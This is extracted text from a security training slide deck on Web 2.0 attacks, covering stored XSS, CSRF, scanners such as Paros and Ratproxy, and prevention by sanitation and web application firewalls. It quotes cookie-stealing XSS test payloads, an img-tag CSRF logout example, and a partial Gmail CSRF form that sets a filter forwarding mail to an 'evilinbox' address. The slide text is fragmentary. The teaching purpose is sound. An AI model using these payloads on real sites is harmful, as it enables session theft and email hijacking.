Web20时代的攻击与防御-骇客入侵手法大剖析.PPT

* * * * * * * * * Cross-Site Scripting Application with stored XSS vulnerability 3 2 Attacker sets the trap – update my profile Attacker enters a malicious script into a web page that stores the data on the server 1 Victim views page – sees attacker profile Script silently sends attacker Victim’s session cookie Script runs inside victim’s browser with full access to the DOM and cookies Custom Code Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Automated Web AP Scanner – XSS, CSRF Commercial Web AP Scanner Paros Cross-Site Scripting Attack Demo XSS attack demo Use web ap scanner to find it Ratproxy – semi-auto web application security assessment tool for XSS, CRSF Cross-Site Scripting (Server-side) Prevention Input/Output Sanitation Don’t trust user input:TextBox, Url, Cookie, HTTP Header Use TextBox and MaxLength attributes Cookie encryption Character encoding(URL Encode) %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E alert(String.fromCharCode(88,83,83)) Writing input/Output filtering is error-prone; it’s advised to use Web Application Firewall scriptalert(document.cookie) /script CSRF example: logout 引誘你點選連結 Assumed that a logout script of a blog web site is as below： /cgi-bin/logout.cgi Then an attacker added the link as below to the blog through CRSF: img src=/cgi-bin/logout.cgi The user will logout automatically when executing the link after the user logged on... CSRF example: Gmail vulnerability /util/csrf? _method=POST_enctype=multipart/form-data_action=https %3A///mail/h/ewt1jmuj4ddv/%3Fv %3Dprfcf2_emc=truecf2_email=evilinbox@cf1_fromcf1_to cf1_subjcf1_hascf1_hasnotcf1_attach=truetfis=zirf=onnvp_bu_cft b=Create%20Filter htmlbody form name=form method=POST enctype=multipart/form-data action=/mail/h/ewt1jmuj4ddv/?v=prf input type=hidden name=cf2_emc value=true/ input type=hidden name=cf2_email value=evilinbox@/ input type=hidden name=cf1_from value=/ input